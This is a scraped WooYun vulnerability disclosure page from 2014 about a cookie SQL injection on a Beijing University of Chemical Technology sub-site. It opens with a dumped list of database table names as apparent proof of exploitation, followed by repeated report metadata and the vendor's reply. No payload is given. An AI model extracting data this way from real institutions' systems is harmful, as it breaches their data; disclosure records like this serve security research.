| changyong                                  |
| dept_code                                  |
| district                                   |
| dizhi                                      |
| dizhiview                                  |
| dizhiwview                                 |
| dtproperties                               |
| dw_bhgz                                    |
| dx1                                        |
| dx2                                        |
| emp_code                                   |
| internet                                   |
| jiajuview                                  |
| jiajuwview                                 |
| jzgjbsjxx                                  |
| leader_1                                   |
| leader_2                                   |
| leader_3                                   |
| leader_4                                   |
| leader_5                                   |
| location                                   |
| mk1_view                                   |
| mk1_view                                   |
| mk1jfkm_view                               |
| mk1syfx_View                               |
| mk1viewall                                 |
| mk1xz_view                                 |
| mk_cb                                      |
| mk_clbz                                    |
| mk_datatype                                |
| mk_dbf                                     |
| mk_dmdz                                    |
| mk_dwxz                                    |
| mk_gb                                      |
| mk_kmk                                     |
| question                                   |
| s_Dw_view                                  |
| s_Dw_view                                  |
| s_gbview                                   |
| s_jgsb                                     |
| s_jmsb                                     |
| s_lyr                                      |
| s_pjb                                      |
| s_ybsb                                     |
| s_zj_e                                     |
| s_zj_j                                     |
| s_zj_ls                                    |
| s_zjallviewds                              |
| s_zjcomm                                   |
| s_zjjj                                     |
| s_zjmb                                     |
| s_zjviewbf                                 |
| s_zjviewbf                                 |
| s_zjviewds                                 |
| sbmk_view                                  |
| sysconstraints                             |
| sysdate                                    |
| sysfunctioninfo                            |
| syssegments                                |
| wt_user                                    |
| ylgmxb                                     |
| ylgtjb                                     |
| zcview                                     |
| zcwview                                    |
+--------------------------------------------+

表段太多了，感觉不会再爱了- -.

修复方案：

版权声明：转载请注明来源从容@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2014-05-28 16:26

厂商回复：

已通知用户处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-062145

漏洞标题：北京化工大学某分站#Cookie Injection

相关厂商：北京化工大学

漏洞作者：从容

提交时间：2014-05-27 10:39

修复时间：2014-07-11 10:40

公开时间：2014-07-11 10:40

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源从容@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-062145

漏洞标题：北京化工大学某分站#Cookie Injection

相关厂商：北京化工大学

漏洞作者： 从容

提交时间：2014-05-27 10:39

修复时间：2014-07-11 10:40

公开时间：2014-07-11 10:40

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：8

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-062145"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 从容@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：从容

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源从容@乌云